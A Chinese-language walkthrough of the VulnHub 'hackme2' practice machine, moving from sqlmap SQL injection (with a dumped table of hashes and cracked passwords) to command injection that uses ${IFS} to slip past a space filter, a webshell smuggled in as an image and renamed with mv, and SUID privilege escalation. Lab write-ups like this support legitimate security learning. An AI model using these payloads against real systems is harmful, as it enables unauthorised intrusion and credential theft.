vulnhub - hackme2

vulnhub - hackme2

資訊收集

還是跟1一樣，目錄掃描之類的沒啥利用點，sql注入先打一遍

SQL隱碼攻擊

sqlmap -u 'http://192.168.157.163/welcome.php' --method POST -data="search=1" --level 3 --dbs --batch

[*] information_schema
[*] mysql
[*] performance_schema
[*] sys
[*] webapphacking

sqlmap -u 'http://192.168.157.163/welcome.php' --method POST -data="search=1" -D webapphacking -T users -C name,user,pasword --dump --batch

+--------------+------------+---------------------------------------------+
| name         | user       | pasword                                     |
+--------------+------------+---------------------------------------------+
| David        | user1      | 5d41402abc4b2a76b9719d911017c592 (hello)    |
| Beckham      | user2      | 6269c4f71a55b24bad0f0267d9be5508 (commando) |
| anonymous    | user3      | 0f359740bd1cda994f8b55330c86d845 (p@ssw0rd) |
| testismyname | test       | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| superadmin   | superadmin | 2386acb2cf356944177746fc92523983            |
| test1        | test1      | 05a671c66aefea124cc08b76ea6d30bb (testtest) |
| 123          | test123    | 4297f44b13955235245b2497399d7a93 (123123)   |
+--------------+------------+---------------------------------------------+

還是一樣，superadmin的密碼是Uncrackable

命令執行

檔案還是能上傳但找不到檔案位置，底下 Last Name輸入框可以執行命令

有空格過濾，用${IFS}繞過

system('cat${IFS}welcomeadmin.php')

找到了檔案上傳路徑，那還是一句話木馬+蟻劍反彈shell

檔案上傳

但這次要圖片馬，php直接上傳會出現報錯

Sorry, only JPG, JPEG, PNG & GIF files are allowed.Sorry, your file was not uploaded.

嘗試了半天還是以失敗告終，上傳不了php

但是既然我們可以執行命令，為什麼不上傳圖片馬後用mv命令來重新命名呢

system('mv${IFS}/var/www/html/uploads/year2020/shell.png${IFS}/var/www/html/uploads/year2020/shell.php')

修改成功後連線蟻劍並反彈shell

提權

使用find查詢可以進行suid的檔案

find / -perm -u=s -type f 2>/dev/null

執行/home/legacy/touchmenot提權成功